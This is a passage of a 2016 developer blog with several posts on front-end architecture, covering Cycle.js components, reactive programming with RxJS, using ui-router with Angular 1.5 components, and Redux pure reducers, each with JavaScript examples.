// Takes an index to remove a counter from the counter list.
function removeCounter(index) {
// Inner reducer function, is given the list of counters.
return function(counters) {
return counters.filter((_, i) => i !== index);
}
}
/*
Creates an Isolate version of the Counter component via CycleIsolate.
This way two Counter components do not get in each others way.
For fun you can alter the body of the function to:
'return Counter({ DOM: sources.DOM });'.
To see the effects of not having isolate Components.
Cycle.js will behind the scenes alter the Virtual DOM of each
Counter to make each counter identifiable. You can inspect via
the browser to see what it does.
For fun you should remove CycleIsolate and return:
Counter({ DOM: sources.DOM })l
*/
function IsolatedCounter(sources) {
return CycleIsolate(Counter)({ DOM: sources.DOM });
}
Cycle.run(CounterList, {
DOM: CycleDOM.makeDOMDriver('#content')
});
</code>
</pre>
A live example can be found here: <a href="http://codepen.io/anon/pen/EKddNO?editors=0010">http://codepen.io/anon/pen/EKddNO?editors=0010</a><br />
<br />
In the example above you can see that our friend the Counter Component exposes his internal 'count' to the outside world. CounterList will then take all counts an tally them up into a total. Two Components communicate with each other via streams, one Components sink will become part of the other Components source.<br />
<br />
It is also interesting to note the a Cycle application and a Cycle Component share the same structure. A Cycle application, just like a Cycle Component also takes sinks and sources. You could say that a Cycle Component is simply a Cycle Application, A Cycle Application is then simply a Cycle Component. The name Cycle.js was really well chosen!<br />
<br />
I have to give <a href="https://github.com/rsbowman">Sean Bowman</a> credit for coming up with how to do multiple counters in this <a href="https://gist.github.com/rsbowman/033308ac60b2a56cb44e">gist</a>.<br />
<div>
<h2>
Resources</h2>
<div>
The <a href="http://cycle.js.org/dialogue.html">Cycle.js</a> website is a real treat because it elegantly and might I say beautifully explains its philosophy.</div>
<div>
<br /></div>
<div>
The creator of Cycle.js André Staltz also greated a great video course explaining the basics of Cycle.js: <a href="https://egghead.io/series/cycle-js-fundamentals">https://egghead.io/series/cycle-js-fundamentals</a>.</div>
<h2>
Conclusions</h2>
<div>
This week we saw and observable based Component architecture in practice. In the weeks before that we saw a unidirectional architecture with Flux and Redux.</div>
<div>
<br /></div>
<div>
<a href="http://dontpanic.42.nl/2016/08/post-mvc-conclusions.html">Next week</a> I want share with you some of my conclusions.</div>
</div>
Anonymousnoreply@blogger.com6tag:blogger.com,1999:blog-8962763253387334081.post-21575680317623133642016-07-21T12:00:00.000+02:002016-07-28T14:51:47.145+02:00Post-MVC part 6: Reactive Programming<h2>
Intro</h2>
<a href="http://dontpanic.42.nl/2016/07/redux.html">Last week</a> I ended on a cliffhanger saying React is often <a href="http://staltz.com/why-react-redux-is-an-inferior-paradigm.html">criticized</a> for not being truly reactive. So this week I want to define what Reactive Programming is all about.<br />
<h2>
Reactive Programming</h2>
To define Reactive Programming we must first look at the form of programming most of us are used to, in the reactive world they call it 'Passive Programming'. The passive and reactive come from the way two 'components' communicate with each other.<br />
<br />
In Passive Programming the relationship between two components is that one component usually controls the other component. For example if we have a Car and an Engine component, the Car object triggers the Engine component. An example in code:<br />
<a name='more'></a><pre><code class="javascript">
Car.prototype.turnKey = function() {
this.engine.fireUp();
}
</code>
</pre>
The Engine is passive, it never actually starts until some other object explicitly starts it. In this case this is the Car.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-q9UHtVDgGkc/V49ovIaYjbI/AAAAAAAAAFA/CD1dre4iwQYYBy1-AMN6Bq39mOqorumFwCLcB/s1600/Passive.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-q9UHtVDgGkc/V49ovIaYjbI/AAAAAAAAAFA/CD1dre4iwQYYBy1-AMN6Bq39mOqorumFwCLcB/s1600/Passive.png" /></a></div>
<br />
In Reactive Programming the relationship is inversed. The Engine starts itself based on certain events. In this case the event would be the Car's turnKey. In pseudo code:
<br />
<pre><code class="javascript">
Engine.listenToKey = function(car) {
car.onKeyTurned(() => {
this.fireUp();
});
}
</code>
</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-eUvgaqv9KJ0/V49o8JgVPAI/AAAAAAAAAFE/fDozhY9CRGcv2wNS83SL0i5AOwoyZzg4gCLcB/s1600/Reactive.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-eUvgaqv9KJ0/V49o8JgVPAI/AAAAAAAAAFE/fDozhY9CRGcv2wNS83SL0i5AOwoyZzg4gCLcB/s1600/Reactive.png" /></a></div>
<br />
<br />
The difference between Passive and Reactive is that the Engine is now responsible for starting itself. This maps back nicely to the the second blog post <a href="http://dontpanic.42.nl/2016/06/post-mvc-mvc-and-javascript.html">MVC and JavaScript</a> in which we learned that Component should be isolated and responsible for themselves. This means that to understand how the Engine works we only have to read the Engine's source code.<br />
<br />
In in Passive Programming you would have to hunt each line of code that called fireUp() to understand when the state of Engine was mutated and by whom.<br />
<br />
Reactive Programming also has a drawback: when you change the 'onKeyTurned' event you will have to hunt down all 'observers' to see how the change affects them.<br />
<br />
Reactive Programming and Passive Programming invert each other in this regard. The benefits of the one are the cons of the other and vice versa.<br />
<br />
The proponents of Reactive Programming advocate that this is a good trade-off because it leads to a better <a href="https://en.wikipedia.org/wiki/Separation_of_concerns">Separation of Concerns</a>. It is better to write a self contained Component than a Component which is influenced non transparently by other Component.<br />
<h2>
Observables</h2>
At the heart of Reactive Programming lies the "Observable". An Observable can be looked at as a souped up <a href="https://en.wikipedia.org/wiki/Observer_pattern">observer pattern</a> as defined by the GoF. It adds two capabilities to the observer pattern the capability to complete, and to ability to signal an error.<br />
<br />
With the "Observable" you can listen to events, events can basically be anythings: mouse clicks, keyboard presses, new tweets, time passing, form submits, Ajax calls etc etc. The Component can then act on these evens as is appropriate for that Component.<br />
<br />
What makes Reactive Programming so powerful is the ability to manipulate these events. I can list the operations which can be performed but that will be very abstract. I'll try to explain this concept by telling a story.<br />
<br />
Imagine you are working at a distribution center for packages. Orders come in and packages come out to the loading bay over a conveyor belt, were the delivery man loads them into their trucks and delivers them.<br />
<br />
The delivery man is an observer of a conveyor belt. Whatever package rolls of the belt he needs to drive to an address. He observes the 'end' of the conveyor belt, lets look at the start of the conveyor belt.<br />
<br />
The first thing that is put on the conveyor belt is an order specification on paper. A robot reads that paper and performs an operation on it, it grabs all items from the order and places them on the conveyor belt. It transforms the order into the real items the customer ordered.<br />
<br />
Further down the line another robot looks at the conveyor belt, it sees the ordered items. To fill up the trucks efficiently it tries to put the items into boxes to save time and space.<br />
<br />
Then another robot sees the boxes and puts a label on them with the address where they need to be delivered.<br />
<br />
Then there is the final robot takes the labeled boxes and gets them off the conveyor belt, and places them into a store. When there are enough boxes that go to the same city he will grab those boxes and send them to a truck. This prevents one driver to have to hop from city to city and makes the delivery process faster.<br />
<br />
The package then finally arrives via the conveyor belt to the delivery man. He loads them onto his truck and delivers them.<br />
<br />
Every robot in this story was an 'operator' which manipulated the 'stream' aka the conveyor belt. You can use a bunch of chained operators to transform and manipulate the stream to something which is consumable by the Component.<br />
<h2>
Libraries</h2>
<div>
<div>
The grand-daddy of all libraries is the <a href="http://reactivex.io/">ReactiveX</a> API. It specifies what an observable stream is supposed to look like, and provides implementations in various libraries. Here's a handy website which interactively shows the operations:<a href="http://rxmarbles.com/"> http://rxmarbles.com/</a>.</div>
<div>
<br /></div>
<div>
The JavaScript implementation of ReactiveX is called: <a href="https://github.com/Reactive-Extensions/RxJS">RxJS</a>.</div>
<div>
<br /></div>
<div>
Other libraries include: <a href="https://baconjs.github.io/">Bacon.js</a>, <a href="http://staltz.com/xstream/">xstream</a>, and <a href="https://github.com/rpominov/kefir">Kefir</a>.</div>
</div>
<div>
<h2>
Example: Konami Code</h2>
<div>
Lets look at an example of how to make a observable Konami Code stream. This example is written with the RxJS:</div>
</div>
<div>
</div>
<pre><code class="javascript">
// The famous sequence of input's representing the KONAMI cheat code.
var KONAMI_CODE = ['UP', 'UP', 'DOWN', 'DOWN',
'LEFT', 'RIGHT', 'LEFT', 'RIGHT',
'B', 'A'];
/*
Takes a KeyBoardEvent and returns either a KONAMI_CODE key
or the value null.
It will return a KONAMI_CODE key when the KeyBoardEvent's key
matches a value in the KONAMI_CODE.
It will return null when the key is not part of the KONAMI_CODE.
*/
function eventToKonamiCode(event) {
switch (event.which) {
case 38: return 'UP';
case 40: return 'DOWN';
case 37: return 'LEFT';
case 39: return 'RIGHT';
case 66: return 'B';
case 65: return 'A';
}
return null;
}
/*
Checks if the codes parameter, which is an array, matches the KONAMI_CODE exactly.
*/
function isKonamiCode(codes) {
return _.isEqual(codes, KONAMI_CODE);
}
/*
Appends the 'code' parameter to the 'codes' parameter, if the
code is the next part of the KONAMI_CODE sequence.
If the code is not the next sequence of the KONAMI_CODE an
empty array is returned.
*/
function codeAccumulator(codes, code) {
// Not a normal KONAMI_CODE key so return an empty array.
if (code === null) {
return [];
}
codes.push(code);
// Check if 'codes' still matches the KONAMI_CODE.
var subKonamiCode = _.take(KONAMI_CODE, codes.length);
if (_.isEqual(codes, subKonamiCode)) {
return codes;
} else {
return []; // No match back to square one.
}
}
var konamiStream = Rx.Observable.fromEvent(document, 'keydown')
.map(eventToKonamiCode)
.scan(codeAccumulator, [])
.filter(isKonamiCode);
var livesSpan = document.querySelector('span');
konamiStream.subscribe(function() {
alert('You entered the Konami code!');
livesSpan.textContent = '99';
});
</code>
</pre>
<div>
<div>
The full example can be found at: <a href="http://codepen.io/anon/pen/ZOxGAq?editors=0010">http://codepen.io/anon/pen/ZOxGAq?editors=0010</a></div>
<h2>
Benefits of Reactive Programming</h2>
<div>
The Konami code snippet displays the great benefit of the streams approach. Every Component can listen to the entry of the Konami Code and do something with it. The Component itself decides to 'react' to the Konami Code and not the other way around.</div>
<div>
<br /></div>
<div>
Having such a loose relationship between the consumer and producer of a streams allows for a greater separation of concerns. A classic example from the Reactive world is an autocomplete component. The user enters some text, an Ajax request is fired, some data comes back and is displayed.</div>
<div>
<br /></div>
<div>
This seems really trivial to implement but is actually quite hard. Lets look at a naive implementation:
<br />
<pre><code class="javascript">
var $input = $('#search-input');
var keyup = Rx.Observable.fromEvent($input, 'keyup')
.map(e => e.target.value) // Project the text from the input
.map(search); // Search does an 'ajax' request
.subscribe(function(data) {
// Update the ui here with the data
}, function(error) {
// Update the ui here saying what the error was.
});
</code>
</pre>
After a while a back-ender tells you the server cannot handle the massive amount of request the front-end sends to the server. It turns out every keystroke is sent to the server.<br />
<br />
If the user types in: "Battlestar" really fast a request for "B", "Ba", "Bat", "Batt" etc etc is made. Luckily RxJS has an operation just for this called debounce. It will filter events that happen close to each other:
<br />
<pre><code class="javascript">
var $input = $('#search-input');
var keyup = Rx.Observable.fromEvent($input, 'keyup')
.map(e => e.target.value) // Project the text from the input
.debounce(500) // Wait for 500 milliseconds after the last event.
.map(search) // Search does an 'ajax' request
.subscribe(function(data) {
// Update the ui here with the data
}, function(error) {
// Update the ui here saying what the error was.
});
</code>
</pre>
Turns out that the search doesn't quite find things accurately when only having three or less characters as the search query. So we filter only the queries that have more than three characters:
<br />
<pre><code class="javascript">
var $input = $('#search-input');
var keyup = Rx.Observable.fromEvent($input, 'keyup')
.map(e => e.target.value) // Project the text from the input
.filter(query => query.length > 3) // Only when more than three characters
.debounce(500) // Wait for 500 milliseconds after the last event.
.map(search) // Search does an 'ajax' request
.subscribe(function(data) {
// Update the ui here with the data
}, function(error) {
// Update the ui here saying what the error was.
});
</code>
</pre>
Now we discover that sometimes the same query is sometimes to the server two times in a row even with the debounce. This happens when the user starts typing again after a query but changes his mind and hits backspaces to his original query. No need to send the request then.<br />
<br />
RxJS has the distinctUntilChanged operator for this usecase. It will make sure that events are only fired when they are different from the last event:
<br />
<pre><code class="javascript">
var $input = $('#search-input');
var keyup = Rx.Observable.fromEvent($input, 'keyup')
.map(e => e.target.value) // Project the text from the input
.filter(query => query.length > 3) // Only when more than three characters
.debounce(500) // Wait for 500 milliseconds after the last event.
.distinctUntilChanged(); // Only if the query has changed
.map(search) // Search does an 'ajax' request
.subscribe(function(data) {
// Update the ui here with the data
}, function(error) {
// Update the ui here saying what the error was.
});
</code>
</pre>
Can anything still go wrong? Sure a rather insidious bug can still occur: when two Ajax calls are made and the server is slow to respond on the first Ajax calls response can come after the second calls response.<br />
<br />
So if the user types in 'Battle' and waits before finishing 'Star' there will be two requests: one for 'Battle' and one for 'BattleStar'. If the server delivers 'BattleStar' response first and 'Battle' later the user will see results for 'Battle' which is unexpected.<br />
<br />
RxJS comes to the rescue yet again with 'flatMapLatest' it will make sure only the latest search query's response will be used:
<br />
<pre><code class="javascript">
var $input = $('#search-input');
var keyup = Rx.Observable.fromEvent($input, 'keyup')
.map(e => e.target.value) // Project the text from the input
.filter(query => query.length > 3) // Only when more than three characters
.debounce(500) // Wait for 500 milliseconds after the last event.
.distinctUntilChanged() // Only if the query has changed
.flatMapLatest(search) // Use only the response for the last query.
.subscribe(function(data) {
// Update the ui here with the data
}, function(error) {
// Update the ui here saying what the error was.
});
</code>
</pre>
With each improvement we did not have to update the code that 'displays' the data aka the subscriber / consumer of the observable.<br />
<br />
This is a very powerful benefit. In essence this allows us to change anything about the way we deliver the end result, as long as we in the end deliver something the consumer expects.<br />
<br />
The consumer of the data is not concerned with how the data is produced.<br />
<br />
The producer of the data is not concerned with how the data is consumed.<br />
<h2>
Cons of using Reactive Programming</h2>
<h3>
We are not in Kansas anymore (again)</h3>
Reactive Programming has a weakness that it shares with Redux. It is not always easy to learn: Observables, Operators, Streams, Hot / Cold etc etc.<br />
<br />
While all of these things are not that difficult to learn, there are many of them. Thinking about Components and applications with these new concepts requires you to learn a new philosophy, and a different way of doing things.<br />
<br />
<h3>
Conceptually Difficult</h3>
Reactive Programming can sometimes be conceptually mind-bindingly difficult.<br />
<br />
From my personal experience lets take the dynamic Counter's list. Next week I will demonstrate how to create this in Cycle.js. It took me quite a long time to program this particular example. I could not<br />
for the life of me figure out how to create the total count.<br />
<br />
I had Observable array of Counters where each item contained a Counter which had an observable inner count$. I had to find a way to combine all count$ streams into one array and do a simple reduce on it.<br />
<br />
After some Googling I found this solution:
<br />
<pre><code class="javascript">
const totalCount$ = counters$.flatMapLatest(counters => {
return Rx.Observable.combineLatest(counters.map(counter => counter.count$))
.map(arr => arr.reduce((total, count) => total + count, 0));
}).startWith(0);
</code>
</pre>
In retrospect this solution is obvious. But coming from an imperative world you really have to rewire your mind. Thinking in streams instead of values takes some getting used to.<br />
<br />
It doesn't help that the documentation for RxJS / ReactiveX is highly conceptual. It does not always provide clear use cases for some operators making it difficult to know if you found the correct one.<br />
<br />
Having said that it was an immensely satisfying experience that has taught me a lot about the nature of some problems. Once your brain makes the 'click' you will the use of streams everywhere.<br />
<br />
The the 'autocomplete' example is a very hard problem to solve elegantly without observables. With observables it is very easy to add lots of functionality just by combining the right operators.<br />
<h2>
Resources</h2>
I really recommend reading André Staltz's excellent introduction to <a href="https://gist.github.com/staltz/868e7e9bc2a7b8c1f754">Reactive Programming</a>.<br />
<h2>
Components and Observables</h2>
This weeks post explained the basics of Observables but did not go into any detail on how this powerful concept can be used in combination with a Component based architecture.<br />
<br />
<a href="http://dontpanic.42.nl/2016/07/cyclejs.html">Next week</a> we will do just that by looking at <a href="http://cycle.js.org/">Cycle.js</a>.</div>
</div>
Anonymousnoreply@blogger.com11tag:blogger.com,1999:blog-8962763253387334081.post-86826231267720906112016-07-20T12:40:00.003+02:002016-07-21T11:22:40.547+02:00Using ui-router as a Component Router<h2>
Intro</h2>
In Angular 1.5 we got the <a href="https://docs.angularjs.org/guide/component">Component</a>, it is an improvement on our old pal the <a href="https://docs.angularjs.org/guide/directive">Directive</a>. In fact a Component is just a Directive with some default settings, and a nicer API.<br />
<br />
Here is a <a href="https://toddmotto.com/exploring-the-angular-1-5-component-method/">great blog post</a> by Todd Motto which explains Components in dept, and compares them to ordinary directives.<br />
<h2>
A tale of two Components</h2>
Components have one other nice feature, they are closely aligned to the way Angular 2.0 will work. In fact if you squint your eyes you cannot really see the difference:<br />
<a name='more'></a><br />
Here is a nameCard Component in Angular 1.x:
<br />
<pre> <code class="javascript">
angular.module('myApp',[])
.component('nameCard', {
bindings: {
name: "@"
},
controllerAs: 'nameCardController',
template: `
<h1>Hi my name is</h1>
<h2>{{ nameCardController.name }}</h2>
`
});
</code>
</pre>
Here is a nameCard Component in Angular 2.x:
<br />
<pre> <code class="javascript">
@Component({
selector: 'name-card',
template: `
<h1>Hi my name is</h1>
<h2>{{ name }}</h2>
`
})
export class NameCardComponent {
@Input() name: String;
}
</code>
</pre>
Here is how you use both of them:
<br />
<pre> <code class="html">
<name-card name="Maarten"></name-card>
</code>
</pre>
<div>
<h2>
Why use Components in Angular 1.5</h2>
<div>
So using Components in Angular 1.5 gets you pretty close the way Angular 2.0, works, which makes migrating to 2.0 a lot easier.</div>
<div>
<br /></div>
<div>
That is why we at 42 decided to use Components instead of Controllers and Element Directives (with restrict E), to prepare us for the migration ahead.</div>
<h2>
ui-router as a Component Router</h2>
<div>
But we hit one problem: we use ui-router, which is not geared towards using Components... or is it?</div>
<div>
<br /></div>
<div>
Turns out you can get ui-router to work with components quite easily:</div>
</div>
<pre> <code class="javascript">
angular.module('myApp', ['ui.router'])
.config(function($stateProvider) {
$stateProvider.state('home', {
url: '/greetings',
template: '<name-card name="Maarten"></name-card>'
})
})
.component('nameCard', {
bindings: {
name: "@"
},
controllerAs: 'nameCardController',
template: `
<h1>Hi my name is</h1>
<h2>{{ nameCardController.name }}</h2>
`
});
</code>
</pre>
<div>
<div>
Basically what we do is say that the template of the 'home' state is simply the use of a single Component. This way there is no need to define a controller and a separate template HTML file for the state.</div>
<div>
<br /></div>
<div>
You can see it live here: <a href="http://codepen.io/anon/pen/jAzOqQ?editors=0010#greetings">http://codepen.io/anon/pen/jAzOqQ?editors=0010#greetings</a></div>
<div>
<br /></div>
<h3>
Dealing with $stateParams</h3>
<div>
The first example hard-coded my name into the Component, what if we want to take a name from the URL instead, to make it more dynamic:</div>
</div>
<pre> <code class="javascript">
angular.module('myApp', ['ui.router'])
.config(function($stateProvider) {
$stateProvider.state('home', {
url: '/greetings/:name',
template: '<name-card></name-card>'
})
})
.component('nameCard', {
controllerAs: 'nameCardController',
controller: function($stateParams) {
const nameCardController = this;
nameCardController.name = $stateParams.name;
},
template: `
<h1>Hi my name is</h1>
<h2>{{ nameCardController.name }}</h2>
`
});
</code>
</pre>
<div>
<div>
In this example we simply inject the $stateParams into the controller</div>
<div>
for the nameCard Component, and use it to get the name from the URL.</div>
<div>
<br /></div>
<div>
You can see it live here: <a href="http://codepen.io/anon/pen/XKEWpW?editors=0010#/greetings/Gertrude">http://codepen.io/anon/pen/XKEWpW?editors=0010#/greetings/Gertrude</a></div>
<div>
<br /></div>
<h3>
Dealing with resolves</h3>
<div>
What if we have resolves in your states how do we deal with that? The answer is by using a 'route' controller like this:</div>
</div>
<pre> <code class="javascript">
angular.module('myApp', ['ui.router'])
.config(function($stateProvider) {
$stateProvider.state('home', {
url: '/greetings',
template: '<name-card name="homeRouteController.name"></name-card>',
controllerAs: "homeRouteController",
controller: function(name) {
const homeRouteController = this;
homeRouteController.name = name;
},
resolve: {
name: function() {
/*
Of course in real life this would get
some data from some REST API.
*/
return "Maarten";
}
}
})
})
.component('nameCard', {
bindings: {
name: "<"
},
controllerAs: 'nameCardController',
template: `
<h1>Hi my name is</h1>
<h2>{{ nameCardController.name }}</h2>
`
});
</code>
</pre>
<div>
<div>
The job of a 'route' controller is acting purely as glue between the resolve and the Component. Its job is to inject all the 'resolves' and them on the scope, so that the template can access them.</div>
<div>
<br /></div>
<div>
Also note that the binding in the Component uses a one way binding (<) now instead of an interpolation binding (@), because name is now a variable instead of a string.</div>
<div>
<br /></div>
<div>
You can see it live here: <a href="http://codepen.io/anon/pen/ZOxEZz?editors=0010#greetings">http://codepen.io/anon/pen/ZOxEZz?editors=0010#greetings</a></div>
<div>
<br /></div>
<h3>
A Nuclear Weapon</h3>
<div>
There is one final weapon in our arsenal: the templateProvider, it allows you to dynamically create a template which ui-router will use.</div>
<div>
<br /></div>
<div>
We can implement the example from 'Dealing with $stateParams' with templateProvider like this:</div>
</div>
<pre> <code class="javascript">
angular.module('myApp', ['ui.router'])
.config(function($stateProvider) {
$stateProvider.state('home', {
url: '/greetings/:name',
templateProvider: function($stateParams) {
const name = $stateParams.name
return `<name-card name="${name}"></name-card>`;
}
})
})
.component('nameCard', {
bindings: {
name: "@"
},
controllerAs: 'nameCardController',
template: `
<h1>Hi my name is</h1>
<h2>{{ nameCardController.name }}</h2>
`
});
</code>
</pre>
<div>
You can see it live here: <a href="http://codepen.io/anon/pen/XKEWpW?editors=0010#/greetings/barry">http://codepen.io/anon/pen/XKEWpW?editors=0010#/greetings/barry</a></div>
<div>
<div>
<br /></div>
<div>
In the templateProvider you have access to all resolves and you can inject any service / factory that you need.</div>
<div>
<br /></div>
<div>
In this example we use it to create a route which passes the 'name' from the $stateParams as a string. This way the nameCard does not need to use a one way binding, but has an interpolation binding instead.</div>
<div>
<br /></div>
<div>
The reason I think this is a nuclear weapon is because you do not really need it. TemplateProviders hide the 'router' from your Component and I feel that this is dishonest. A Component should be aware that it represents a 'state' by injecting the $stateParams in its controller.</div>
<div>
<br /></div>
<div>
In Angular 2.0 when a Component needs a parameter from the route it will get it himself, see this <a href="http://victorsavkin.com/post/145672529346/angular-router">blog post</a> by Victor Savkin under the heading "Using Params". That is why I advocate always injecting the $stateParams in the Component so it is closer to best practices in Angular 2.0.<br />
<h2>
ui-router 1.0.0</h2>
</div>
<div>
In ui-router 1.0.0 it is going to be even easier to route to a Component, because it will be directly supported by ui-router. See this page: <a href="https://ui-router.github.io/tutorial/ng1/hellosolarsystem">https://ui-router.github.io/tutorial/ng1/hellosolarsystem</a> on how to do this.</div>
<h2>
Conclusion</h2>
<div>
Using Components in Angular 1.5 will make migrating easier.</div>
<div>
<br /></div>
<div>
Using ui-router as a Component router is really not that hard.</div>
<div>
<br /></div>
<div>
That is it, happy routing!</div>
</div>
Anonymousnoreply@blogger.com37tag:blogger.com,1999:blog-8962763253387334081.post-68795257676499477852016-07-15T09:58:00.001+02:002016-07-21T13:27:34.038+02:00Post-MVC part 5: Redux<h2>
Intro</h2>
<a href="http://dontpanic.42.nl/2016/07/enter-the-flux.html" target="_blank">Last week</a> we delved into Flux and saw the benefits of having a unidirectional architecture. We also learned that there were multiple Flux implementations, each implementing Flux in slightly different ways to improve upon it.<br />
<br />
This week I want to take a look at <a href="http://redux.js.org/index.html" target="_blank">Redux</a> which takes Flux and improves it greatly making all sorts of cool things possible. Redux is the most <a href="https://github.com/kriasoft/react-starter-kit/issues/22" target="_blank">popular</a> Flux implementation at the moment.<br />
<h2>
Redux</h2>
Redux takes Flux and improves on it, so what are the differences between Flux and Redux?<br />
<br />
<h3>
A single source of Truth</h3>
Flux has the concept of Stores, which represent a group of domain entities and the operations that can be performed on them. For example a CarStore would contain all 'car' objects and have operations to add and remove cars.<br />
<br />
Each domain entity has their own Store. This means that the 'state' of the application, whilst having a clear location, is still located in multiple objects. Redux argues against this approach, Redux has a single Store for every entity. In other words the entire state of the application is stored inside a single variable.<br />
<br />
This sounds a bit like a mad idea but it actually has benefits.<br />
<a name='more'></a><br />
Do you know what this reminds me of... websites. Earlier in my career I interned as a PHP developer at a company that made websites. To make the websites more dynamic we used PHP in combination with MySQL as the database to store the state in.<br />
<br />
The database was the single source of truth. Whatever data was in the database was the truth. The PHP layer simply took that data and transformed it into HTML for the browser to render.<br />
<br />
Whenever something glitchey happened due to a loss of network connection or some JavaScript enhancement that did not work for some reason, we always told the customer to simply reload the 'page'. This would give them the representation of what was in the database at that moment. In other words the page would show the correct 'state' again. They may lose some data in the process but at least they knew the 'truth' again.<br />
<br />
Having a single source of truth made debugging easier. If we saw some strange text we would check the database to see the actual 'truth'. If there was a mismatch the PHP must have done something with the value we did not expect. I would trace the value through the system until I found the culprit.<br />
<br />
Redux brings back this workflow. See something strange on the page, check the 'truth' first and then figure out what the problem is.<br />
<br />
A single source of truth on the client side also has some debugging benefits. Imagine sending the current state whenever a JavaScript error occurs, including a list of actions, back to the server. You can then locally on your dev machine, load the state for that user at that particular time and replay the actions. With a single source of truth this is trivial, imagine doing the same in an Angular 1.x application!<br />
<br />
Having the state in one location also makes Redux conceptually easier. You simply know where the state is located in your application.<br />
<br />
<h3>
Dispatcher</h3>
Redux now longer has a Dispatcher. In Flux the Dispatcher, a singleton, would act as a conduit for all Actions, the stores would register themselves to the Dispatcher to be notified of when an Action occurred.<br />
<br />
Since there is only a single Store in Redux the need for the Dispatcher as a separate object is no longer needed. The singular Store itself can take on this responsibility instead. So while there still a Dispatcher concept is has been merged into the Store.<br />
<br />
<h3>
Pure Reducers</h3>
Redux also has a very strict philosophy on how the state is changed. Redux advocates doing state change via pure functions. A <a href="https://en.wikipedia.org/wiki/Pure_function" target="_blank">pure function</a> has the following characteristics:<br />
<br />
A pure function does not mutate anything in the outside world. Whatever the state was outside of the function that state will be the same after the function was called. In other words external variables / objects / arrays will not be changed.<br />
<br />
A pure function will always give the same output when the same input is given. In other words if you give a function the same parameters / arguments it will always return the same output. For example if we give a function the parameters 10 and 12 and returns 42. It should always return 42 when the parameters 10 and 12 are given.<br />
<br />
These two characteristics of a pure function makes them very reliable and easy to test. These also make them very appropriate to handle state changes.<br />
<br />
Redux has a single Store which can be modified by sending Actions to it. The Actions are processed by a single 'Reducer'. A reducer is a function which takes the previous state and the Action and returns a completely new state. Redux's website describes the signature of a reducer as follows: (previousState, action) => newState.<br />
<h2>
Counter App Example</h2>
Let's look at a simple example. Lets say we have an application which counts how many laps a person walked around a track. The application is very simple it has two buttons one to increment the count and one to decrement the count for when a mistake was made.<br />
<br />
Lets look at the store for such a state and its reducer:<br />
<pre><code class="javascript">
// The initial count starts at zero.
const initialCount = 0;
// Defines all possible actions as const's.
const INCREMENT_COUNTER = "INCREMENT_COUNTER";
const DECREMENT_COUNTER = "DECREMENT_COUNTER";
// Create the store with the reducer and the initial state.
let store = Redux.createStore(counterApp, initialCount);
// The reducer for the counter application.
function counterApp(state, action) {
switch(action.type) {
case INCREMENT_COUNTER:
return state + 1;
case DECREMENT_COUNTER:
return state - 1;
}
return state;
};
/* Action creator functions: functions that create Redux actions */
function incrementCounter() {
return {
type: INCREMENT_COUNTER
};
}
function decrementCounter() {
return {
type: DECREMENT_COUNTER
};
}
</code>
</pre>
The full example can be found here: http://codepen.io/anon/pen/oxqEpd?editors=0010<br />
<br />
In the counter example the state was simply a number which was either incremented or decremented. Lets look at a more complex example: an application which has multiple counters, and has a total count for all counter combined.<br />
<pre><code class="javascript">
// Initially there will be zero counters
const initialState = { counters: {}, nextCounterId: 0, totalCount: 0 };
// Define the actions for adding and removing counters.
const CREATE_COUNTER = "CREATE_COUNTER";
const REMOVE_COUNTER = "REMOVE_COUNTER";
// Defines the actions on a counter.
const INCREMENT_COUNTER = "INCREMENT_COUNTER";
const DECREMENT_COUNTER = "DECREMENT_COUNTER";
// Create the store with the reducer and the initial state.
let store = Redux.createStore(counterApp, initialState);
// The reducer for the multi-counters application.
function counterApp(state, action) {
switch(action.type) {
case CREATE_COUNTER:
var nextState = Object.assign({}, state); // Makes a copy of the state.
nextState.nextCounterId = state.nextCounterId + 1;
nextState.counters[state.nextCounterId] = {
count: 0,
counter: state.nextCounterId
};
return nextState;
case REMOVE_COUNTER:
var nextState = Object.assign({}, state); // Makes a copy of the state.
delete nextState.counters[action.counter];
nextState.totalCount = calculateTotalCount(_.values(nextState.counters));
return nextState;
case INCREMENT_COUNTER:
var nextState = Object.assign({}, state); // Makes a copy of the state
nextState.counters[action.counter].count += 1;
nextState.totalCount = calculateTotalCount(_.values(nextState.counters));
return nextState;
case DECREMENT_COUNTER:
var nextState = Object.assign({}, state); // Makes a copy of the state
nextState.counters[action.counter].count -= 1;
nextState.totalCount = calculateTotalCount(_.values(nextState.counters));
return nextState;
}
return state;
};
// Function to calculate the total count
function calculateTotalCount(counters) {
return counters.reduce((total, counter) => total + counter.count, 0);
}
/* Action creator functions: functions that create Redux actions */
function incrementCounter(counter) {
return {
type: INCREMENT_COUNTER,
counter: counter
};
}
function decrementCounter(counter) {
return {
type: DECREMENT_COUNTER,
counter: counter
};
}
function createCounter() {
return {
type: CREATE_COUNTER
};
}
function removeCounter(counter) {
return {
type: REMOVE_COUNTER,
counter: counter
}
}
</code>
</pre>
Note that the Object.assign is used to make a copy of the state object. Remember we never want to mutate the 'old' state directly since this is impure.<br />
<br />
The full example can be found here: http://codepen.io/anon/pen/wGmjxx?editors=0010<br />
<h2>
Benefits of Redux</h2>
Since Redux is Flux-like all benefits of Flux are also the benefits of Redux. See <a href="http://dontpanic.42.nl/2016/07/enter-the-flux.html" target="_blank">last weeks</a> post. This is not true vice versa:<br />
<br />
The benefits of Redux are the benefits of having a singular store with one variable holding the entire state. This enables a lot of cool functionality.<br />
<br />
<h3>
Time Travel Debugging</h3>
One benefit is Time Travel Debugging, which means you can go back to to a previous state whenever you want, and forward again.<br />
<br />
This is possible due to the nature of Redux's pure reducer functions. The state is always copied and never directly mutated, this means you can keep an array of the previous states. If you want to go back to a certain state from the array you can simply assign it to the current state.<br />
<br />
There is a Chrome plugin which builds a debugger into the devtools: <a href="https://github.com/zalmoxisus/redux-devtools-extension">https://github.com/zalmoxisus/redux-devtools-extension</a>. If you want to play with time travel debugging yourself make sure the plugin is installed and check out the examples.<br />
<br />
<h3>
Hot reloading</h3>
Another benefit is so called hot reloading.<br />
<br />
Normally when you work on a Component you will have to reload the page every time the Component is changed to see the code changes effects. Some development systems can automate this task by watching the file system for you.<br />
<br />
Hot reloading goes one step further. Hot reloading will change the Component without reloading the page and playback all events to get the Component in the correct state. This means that you will see your code changes immediately reflected in your browser, without losing the state of the page.<br />
<br />
